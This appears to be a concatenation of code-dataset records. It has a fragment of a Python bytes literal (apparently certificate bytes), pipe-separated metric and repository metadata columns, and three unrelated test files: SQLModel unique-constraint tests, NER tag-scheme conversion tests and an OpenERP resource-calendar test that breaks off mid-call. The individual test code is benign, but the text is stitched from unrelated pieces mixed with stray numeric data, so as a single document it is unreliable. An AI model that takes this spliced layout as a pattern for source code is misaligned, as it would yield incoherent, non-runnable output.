b"\x3d\x4e\xb0\x59\xb2\xa7\xab\x2d\xac\xd1\xaf\xae\x77\x12\xd3\x30\x97\x28\xd5\xe7\x88\x34\x35\x10\x66\x45\x52\x5f\xea\xfb\x02\x9b" + \
b"\x75\x5c\x77\x67\x02\x03\x01\x00\x01\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x0b\x05\x00\x03\x81\x81\x00\xd6\x2c\x88\x43" + \
b"\x42\x2a\x0c\x8b\x1c\xd4\xe9\xd1\x16\xd5\x4b\xd3\x00\x5e\xeb\xa3\xdb\x21\x2c\x35\xb5\xbb\xa7\xc8\xb9\x58\x51\x34\x5b\x91\xf7\xc3" + \
b"\x17\x20\x6b\x18\x4d\x5f\x13\x42\x60\x17\x6e\x09\x82\x50\x55\x45\xd9\x6a\x74\xf5\xa9\x10\x3d\x2e\xf1\x16\xad\xa5\x0d\x25\xe7\x06" + \
b"\x22\x0e\x82\xae\x76\x80\x85\x3d\x0a\x3b\x20\x01\xc9\x42\xdd\x19\xfe\x1b\xda\x5d\x6d\x1b\xd7\x0d\x10\x39\x74\x97\xd7\x36\x8c\x1a" + \
b"\x56\x28\x98\x13\xaa\x35\xe7\xa4\xa0\xdd\x60\xba\xed\xca\x4e\xda\x57\x3b\xdf\xd7\xb8\xa7\x9f\xf1\x75\xa6\xbf\x0a"]
| 140.219512
| 149
| 0.658027
| 1,284
| 5,749
| 2.944704
| 0.191589
| 0.012695
| 0.011902
| 0.015869
| 0.461783
| 0.461783
| 0.461783
| 0.456229
| 0.418143
| 0.403861
| 0
| 0.331982
| 0.0988
| 5,749
| 40
| 150
| 143.725
| 0.3978
| 0
| 0
| 0
| 0
| 0.975
| 0.862063
| 0.860671
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
65ad0d9b5616e984d3c65175f2fbb391df663ea0
| 2,844
|
py
|
Python
|
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | 3
|
2021-11-10T14:39:22.000Z
|
2021-12-13T16:01:48.000Z
|
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
macrosfirst/sqlmodel
|
bda2e2818a3e7c2a18be4adf55bfea9bad83bfcc
|
[
"MIT"
] | null | null | null |
import pytest
from typing import Optional
from sqlmodel import Field, Session, SQLModel, create_engine
from sqlalchemy.exc import IntegrityError
def test_should_allow_duplicate_row_if_unique_constraint_is_not_passed(clear_sqlmodel):
class Hero(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
secret_name: str
age: Optional[int] = None
hero_1 = Hero(name="Deadpond", secret_name="Dive Wilson")
hero_2 = Hero(name="Deadpond", secret_name="Dive Wilson")
engine = create_engine("sqlite://")
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
session.add(hero_1)
session.commit()
session.refresh(hero_1)
with Session(engine) as session:
session.add(hero_2)
session.commit()
session.refresh(hero_2)
with Session(engine) as session:
heroes = session.query(Hero).all()
assert len(heroes) == 2
assert heroes[0].name == heroes[1].name
def test_should_allow_duplicate_row_if_unique_constraint_is_false(clear_sqlmodel):
class Hero(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
secret_name: str = Field(unique=False)
age: Optional[int] = None
hero_1 = Hero(name="Deadpond", secret_name="Dive Wilson")
hero_2 = Hero(name="Deadpond", secret_name="Dive Wilson")
engine = create_engine("sqlite://")
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
session.add(hero_1)
session.commit()
session.refresh(hero_1)
with Session(engine) as session:
session.add(hero_2)
session.commit()
session.refresh(hero_2)
with Session(engine) as session:
heroes = session.query(Hero).all()
assert len(heroes) == 2
assert heroes[0].name == heroes[1].name
def test_should_raise_exception_when_try_to_duplicate_row_if_unique_constraint_is_true(clear_sqlmodel):
class Hero(SQLModel, table=True):
id: Optional[int] = Field(default=None, primary_key=True)
name: str
secret_name: str = Field(unique=True)
age: Optional[int] = None
hero_1 = Hero(name="Deadpond", secret_name="Dive Wilson")
hero_2 = Hero(name="Deadpond", secret_name="Dive Wilson")
engine = create_engine("sqlite://")
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
session.add(hero_1)
session.commit()
session.refresh(hero_1)
with pytest.raises(IntegrityError):
with Session(engine) as session:
session.add(hero_2)
session.commit()
session.refresh(hero_2)
| 30.913043
| 104
| 0.647328
| 355
| 2,844
| 4.983099
| 0.183099
| 0.050876
| 0.07688
| 0.085924
| 0.887507
| 0.887507
| 0.869418
| 0.869418
| 0.869418
| 0.869418
| 0
| 0.011225
| 0.248242
| 2,844
| 91
| 105
| 31.252747
| 0.816183
| 0
| 0
| 0.835821
| 0
| 0
| 0.051217
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 1
| 0.044776
| false
| 0.014925
| 0.059701
| 0
| 0.328358
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
029c87349f383916286697d2d9ecb30bf50c1e34
| 9,849
|
py
|
Python
|
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
nerblackbox/tests/test_tags.py
|
flxst/nerblackbox
|
7612b95850e637be258f6bfb01274453b7372f99
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from typing import List
from nerblackbox.modules.ner_training.annotation_tags.tags import Tags
########################################################################################################################
########################################################################################################################
########################################################################################################################
class TestTags:
####################################################################################################################
####################################################################################################################
####################################################################################################################
@pytest.mark.parametrize(
"source_scheme, " "input_sequence, " "target_scheme, " "output_sequence",
[
# 1. plain -> plain
(
"plain",
["O", "A", "A", "O", "O", "O", "B", "O"],
"plain",
["O", "A", "A", "O", "O", "O", "B", "O"],
),
# 2. plain -> bio
(
"plain",
["O", "A", "A", "O", "O", "O", "B", "O"],
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
# 3. plain -> bilou
(
"plain",
["O", "A", "A", "A", "O", "O", "O", "B", "O"],
"bilou",
["O", "B-A", "I-A", "L-A", "O", "O", "O", "U-B", "O"],
),
# 4. bio -> plain
(
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"plain",
["O", "A", "A", "O", "O", "O", "B", "O"],
),
# 5. bio -> bio
(
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
(
"bio",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
"bio",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
# ["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
(
"bio",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
"bio",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
# ["B-B", "B-A", "B-A", "O", "O", "B-A", "B-B", "O"],
),
# 6. bio -> bilou
(
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
),
# 7. bilou -> plain
(
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
"plain",
["O", "A", "A", "O", "O", "O", "B", "O"],
),
# 8. bilou -> bio
(
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
# 9. bilou -> bilou
(
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
),
(
"bilou",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
"bilou",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
# ["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
),
(
"bilou",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
"bilou",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
# ["U-B", "U-A", "U-A", "O", "O", "U-A", "U-B", "O"],
),
(
"bilou",
["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
"bilou",
["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
# ["B-A", "I-A", "L-A", "O", "O", "U-A", "U-B", "O"],
),
# 10. unknown input scheme
(
"xyz",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"bio",
None,
),
# 11. wrong input scheme
(
"plain",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"bio",
None,
),
(
"bio",
["O", "A", "A", "O", "O", "O", "B", "O"],
"bio",
None,
),
(
"bilou",
["O", "A", "A", "O", "O", "O", "B", "O"],
"bio",
None,
),
# 12. incorrect tag format
(
"bio",
["O", "B-A", "L-A", "O", "O", "O", "B-B", "O"],
"bio",
None,
),
],
)
def test_convert_scheme(
self,
source_scheme: str,
input_sequence: List[str],
target_scheme: str,
output_sequence: List[str],
):
if output_sequence is not None:
test_output_sequence = Tags(input_sequence).convert_scheme(
source_scheme, target_scheme
)
assert (
test_output_sequence == output_sequence
), f"{test_output_sequence} != {output_sequence}"
else:
with pytest.raises(Exception):
Tags(input_sequence).convert_scheme(source_scheme, target_scheme)
####################################################################################################################
####################################################################################################################
####################################################################################################################
@pytest.mark.parametrize(
"source_scheme, " "input_sequence, " "target_scheme, " "output_sequence",
[
# 5. bio -> bio
(
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
(
"bio",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
"bio",
# ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
),
(
"bio",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
"bio",
# ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
["B-B", "B-A", "B-A", "O", "O", "B-A", "B-B", "O"],
),
# 9. bilou -> bilou
(
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
"bilou",
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
),
(
"bilou",
["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
"bilou",
# ["O", "I-A", "I-A", "O", "O", "O", "I-B", "O"],
["O", "B-A", "L-A", "O", "O", "O", "U-B", "O"],
),
(
"bilou",
["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
"bilou",
# ["B-B", "I-A", "B-A", "O", "O", "I-A", "I-B", "O"],
["U-B", "U-A", "U-A", "O", "O", "U-A", "U-B", "O"],
),
(
"bilou",
["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
"bilou",
# ["B-A", "I-A", "I-A", "O", "O", "I-A", "I-B", "O"],
["B-A", "I-A", "L-A", "O", "O", "U-A", "U-B", "O"],
),
# 11. wrong input scheme
(
"bio",
["O", "A", "A", "O", "O", "O", "B", "O"],
"bio",
None,
),
(
"bilou",
["O", "A", "A", "O", "O", "O", "B", "O"],
"bio",
None,
),
# 12. incorrect tag format
(
"bio",
["O", "B-A", "L-A", "O", "O", "O", "B-B", "O"],
"bio",
None,
),
# 13. unknown output scheme
(
"bio",
["O", "B-A", "I-A", "O", "O", "O", "B-B", "O"],
"xyz",
None,
),
],
)
def test_restore_annotation_scheme_consistency(
self,
source_scheme: str,
input_sequence: List[str],
target_scheme: str,
output_sequence: List[str],
):
if output_sequence is not None:
test_output_sequence = Tags(
input_sequence
).restore_annotation_scheme_consistency(target_scheme)[0]
assert (
test_output_sequence == output_sequence
), f"{test_output_sequence} != {output_sequence}"
else:
with pytest.raises(Exception):
Tags(input_sequence).restore_annotation_scheme_consistency(
target_scheme
)
| 36.343173
| 120
| 0.225201
| 975
| 9,849
| 2.213333
| 0.068718
| 0.100093
| 0.084801
| 0.079703
| 0.8443
| 0.8443
| 0.841983
| 0.83874
| 0.83874
| 0.745598
| 0
| 0.004331
| 0.437303
| 9,849
| 270
| 121
| 36.477778
| 0.38506
| 0.084476
| 0
| 0.76087
| 0
| 0
| 0.145216
| 0.005546
| 0
| 0
| 0
| 0
| 0.008696
| 1
| 0.008696
| false
| 0
| 0.013043
| 0
| 0.026087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
02e939c75b6efc55606337c240a9fc991c22e34e
| 34,045
|
py
|
Python
|
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | null | null | null |
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | null | null | null |
Code/odooerp/odoo-8.0/openerp/addons/resource/tests/test_resource.py
|
zhupangithub/WEBERP
|
714512082ec5c6db07cbf6af0238ceefe2d2c1a5
|
[
"MIT"
] | 3
|
2020-10-08T14:42:10.000Z
|
2022-01-28T14:12:29.000Z
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (c) 2013-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp.addons.resource.tests.common import TestResourceCommon
class TestResource(TestResourceCommon):
def test_00_intervals(self):
intervals = [
(
datetime.strptime('2013-02-04 09:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-04 11:00:00', '%Y-%m-%d %H:%M:%S')
), (
datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-04 12:00:00', '%Y-%m-%d %H:%M:%S')
), (
datetime.strptime('2013-02-04 11:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S')
), (
datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S')
), (
datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S')
), (
datetime.strptime('2013-02-04 18:00:00', '%Y-%m-%d %H:%M:%S'),
datetime.strptime('2013-02-04 19:00:00', '%Y-%m-%d %H:%M:%S')
)
]
# Test: interval cleaning
cleaned_intervals = self.resource_calendar.interval_clean(intervals)
self.assertEqual(len(cleaned_intervals), 3, 'resource_calendar: wrong interval cleaning')
# First interval: 03, unchanged
self.assertEqual(cleaned_intervals[0][0], datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
self.assertEqual(cleaned_intervals[0][1], datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
# Second intreval: 04, 08-14, combining 08-12 and 11-14, 09-11 being inside 08-12
self.assertEqual(cleaned_intervals[1][0], datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
self.assertEqual(cleaned_intervals[1][1], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
# Third interval: 04, 17-21, 18-19 being inside 17-21
self.assertEqual(cleaned_intervals[2][0], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
self.assertEqual(cleaned_intervals[2][1], datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong interval cleaning')
# Test: disjoint removal
working_interval = (datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), datetime.strptime('2013-02-04 18:00:00', '%Y-%m-%d %H:%M:%S'))
result = self.resource_calendar.interval_remove_leaves(working_interval, intervals)
self.assertEqual(len(result), 1, 'resource_calendar: wrong leave removal from interval')
# First interval: 04, 14-17
self.assertEqual(result[0][0], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
self.assertEqual(result[0][1], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
# Test: schedule hours on intervals
result = self.resource_calendar.interval_schedule_hours(cleaned_intervals, 5.5)
self.assertEqual(len(result), 2, 'resource_calendar: wrong hours scheduling in interval')
# First interval: 03, 8-10 untouches
self.assertEqual(result[0][0], datetime.strptime('2013-02-03 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
self.assertEqual(result[0][1], datetime.strptime('2013-02-03 10:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
# First interval: 04, 08-11:30
self.assertEqual(result[1][0], datetime.strptime('2013-02-04 08:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
self.assertEqual(result[1][1], datetime.strptime('2013-02-04 11:30:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
# Test: schedule hours on intervals, backwards
cleaned_intervals.reverse()
result = self.resource_calendar.interval_schedule_hours(cleaned_intervals, 5.5, remove_at_end=False)
self.assertEqual(len(result), 2, 'resource_calendar: wrong hours scheduling in interval')
# First interval: 03, 8-10 untouches
self.assertEqual(result[0][0], datetime.strptime('2013-02-04 17:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
self.assertEqual(result[0][1], datetime.strptime('2013-02-04 21:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
# First interval: 04, 08-11:30
self.assertEqual(result[1][0], datetime.strptime('2013-02-04 12:30:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
self.assertEqual(result[1][1], datetime.strptime('2013-02-04 14:00:00', '%Y-%m-%d %H:%M:%S'), 'resource_calendar: wrong leave removal from interval')
def test_10_calendar_basics(self):
""" Testing basic method of resource.calendar """
cr, uid = self.cr, self.uid
# --------------------------------------------------
# Test1: get_next_day
# --------------------------------------------------
# Test: next day: next day after day1 is day4
date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date1.date())
self.assertEqual(date, self.date2.date(), 'resource_calendar: wrong next day computing')
# Test: next day: next day after day4 is (day1+7)
date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date2.date())
self.assertEqual(date, self.date1.date() + relativedelta(days=7), 'resource_calendar: wrong next day computing')
# Test: next day: next day after day4+1 is (day1+7)
date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date2.date() + relativedelta(days=1))
self.assertEqual(date, self.date1.date() + relativedelta(days=7), 'resource_calendar: wrong next day computing')
# Test: next day: next day after day1-1 is day1
date = self.resource_calendar.get_next_day(cr, uid, self.calendar_id, day_date=self.date1.date() + relativedelta(days=-1))
self.assertEqual(date, self.date1.date(), 'resource_calendar: wrong next day computing')
# --------------------------------------------------
# Test2: get_previous_day
# --------------------------------------------------
# Test: previous day: previous day before day1 is (day4-7)
date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date1.date())
self.assertEqual(date, self.date2.date() + relativedelta(days=-7), 'resource_calendar: wrong previous day computing')
# Test: previous day: previous day before day4 is day1
date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date2.date())
self.assertEqual(date, self.date1.date(), 'resource_calendar: wrong previous day computing')
# Test: previous day: previous day before day4+1 is day4
date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date2.date() + relativedelta(days=1))
self.assertEqual(date, self.date2.date(), 'resource_calendar: wrong previous day computing')
# Test: previous day: previous day before day1-1 is (day4-7)
date = self.resource_calendar.get_previous_day(cr, uid, self.calendar_id, day_date=self.date1.date() + relativedelta(days=-1))
self.assertEqual(date, self.date2.date() + relativedelta(days=-7), 'resource_calendar: wrong previous day computing')
# --------------------------------------------------
# Test3: misc
# --------------------------------------------------
weekdays = self.resource_calendar.get_weekdays(cr, uid, self.calendar_id)
self.assertEqual(weekdays, [1, 4], 'resource_calendar: wrong weekdays computing')
attendances = self.resource_calendar.get_attendances_for_weekdays(cr, uid, self.calendar_id, [2, 3, 4, 5])
self.assertEqual(set([att.id for att in attendances]), set([self.att2_id, self.att3_id]),
'resource_calendar: wrong attendances filtering by weekdays computing')
def test_20_calendar_working_intervals(self):
""" Testing working intervals computing method of resource.calendar """
cr, uid = self.cr, self.uid
context = self.context
_format = '%Y-%m-%d %H:%M:%S'
# Test: day0 without leaves: 1 interval
intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1, context=context)
self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 09:08:07', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working intervals')
# Test: day3 without leaves: 2 interval
intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date2, context=context)
self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-15 10:11:12', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-15 13:00:00', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[1][0], datetime.strptime('2013-02-15 16:00:00', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[1][1], datetime.strptime('2013-02-15 23:00:00', _format), 'resource_calendar: wrong working intervals')
# Test: day0 with leaves outside range: 1 interval
intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=0), compute_leaves=True, context=context)
self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 08:00:00', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working intervals')
# Test: day0 with leaves: 2 intervals because of leave between 9 ans 12, ending at 15:45:30
intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id,
start_dt=self.date1.replace(hour=8) + relativedelta(days=7),
end_dt=self.date1.replace(hour=15, minute=45, second=30) + relativedelta(days=7),
compute_leaves=True, context=context)
self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:08:07', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 09:00:00', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[1][0], datetime.strptime('2013-02-19 12:00:00', _format), 'resource_calendar: wrong working intervals')
self.assertEqual(intervals[1][1], datetime.strptime('2013-02-19 15:45:30', _format), 'resource_calendar: wrong working intervals')
def test_30_calendar_working_days(self):
""" Testing calendar hours computation on a working day """
cr, uid = self.cr, self.uid
context = self.context
_format = '%Y-%m-%d %H:%M:%S'
# Test: day1, beginning at 10:30 -> work from 10:30 (arrival) until 16:00
intervals = self.resource_calendar.get_working_intervals_of_day(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=10, minute=30, second=0), context=context)
self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-12 10:30:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
# Test: hour computation for same interval, should give 5.5
wh = self.resource_calendar.get_working_hours_of_date(cr, uid, self.calendar_id, start_dt=self.date1.replace(hour=10, minute=30, second=0), context=context)
self.assertEqual(wh, 5.5, 'resource_calendar: wrong working interval / day time computing')
# Test: day1+7 on leave, without leave computation
intervals = self.resource_calendar.get_working_intervals_of_day(
cr, uid, self.calendar_id,
start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=7), context=context
)
# Result: day1 (08->16)
self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval/day computing')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
# Test: day1+7 on leave, with generic leave computation
intervals = self.resource_calendar.get_working_intervals_of_day(
cr, uid, self.calendar_id,
start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=7),
compute_leaves=True, context=context
)
# Result: day1 (08->09 + 12->16)
self.assertEqual(len(intervals), 2, 'resource_calendar: wrong working interval/day computing')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-19 09:00:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[1][0], datetime.strptime('2013-02-19 12:00:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[1][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
# Test: day1+14 on leave, with generic leave computation
intervals = self.resource_calendar.get_working_intervals_of_day(
cr, uid, self.calendar_id,
start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=14),
compute_leaves=True, context=context
)
# Result: day1 (08->16)
self.assertEqual(len(intervals), 1, 'resource_calendar: wrong working interval/day computing')
self.assertEqual(intervals[0][0], datetime.strptime('2013-02-26 08:00:00', _format), 'resource_calendar: wrong working interval / day computing')
self.assertEqual(intervals[0][1], datetime.strptime('2013-02-26 16:00:00', _format), 'resource_calendar: wrong working interval / day computing')
# Test: day1+14 on leave, with resource leave computation
intervals = self.resource_calendar.get_working_intervals_of_day(
cr, uid, self.calendar_id,
start_dt=self.date1.replace(hour=7, minute=0, second=0) + relativedelta(days=14),
compute_leaves=True,
resource_id=self.resource1_id, context=context
)
# Result: nothing, because on leave
self.assertEqual(len(intervals), 0, 'resource_calendar: wrong working interval/day computing')
def test_40_calendar_hours_scheduling(self):
""" Testing calendar hours scheduling """
cr, uid = self.cr, self.uid
context = self.context
_format = '%Y-%m-%d %H:%M:%S'
# --------------------------------------------------
# Test0: schedule hours backwards (old interval_min_get)
# Done without calendar
# --------------------------------------------------
# Done without calendar
# res = self.resource_calendar.interval_min_get(cr, uid, None, self.date1, 40, resource=False)
# res: (datetime.datetime(2013, 2, 7, 9, 8, 7), datetime.datetime(2013, 2, 12, 9, 8, 7))
# --------------------------------------------------
# Test1: schedule hours backwards (old interval_min_get)
# --------------------------------------------------
# res = self.resource_calendar.interval_min_get(cr, uid, self.calendar_id, self.date1, 40, resource=False)
# (datetime.datetime(2013, 1, 29, 9, 0), datetime.datetime(2013, 1, 29, 16, 0))
# (datetime.datetime(2013, 2, 1, 8, 0), datetime.datetime(2013, 2, 1, 13, 0))
# (datetime.datetime(2013, 2, 1, 16, 0), datetime.datetime(2013, 2, 1, 23, 0))
# (datetime.datetime(2013, 2, 5, 8, 0), datetime.datetime(2013, 2, 5, 16, 0))
# (datetime.datetime(2013, 2, 8, 8, 0), datetime.datetime(2013, 2, 8, 13, 0))
# (datetime.datetime(2013, 2, 8, 16, 0), datetime.datetime(2013, 2, 8, 23, 0))
# (datetime.datetime(2013, 2, 12, 8, 0), datetime.datetime(2013, 2, 12, 9, 0))
res = self.resource_calendar.schedule_hours(cr, uid, self.calendar_id, -40, day_dt=self.date1.replace(minute=0, second=0), context=context)
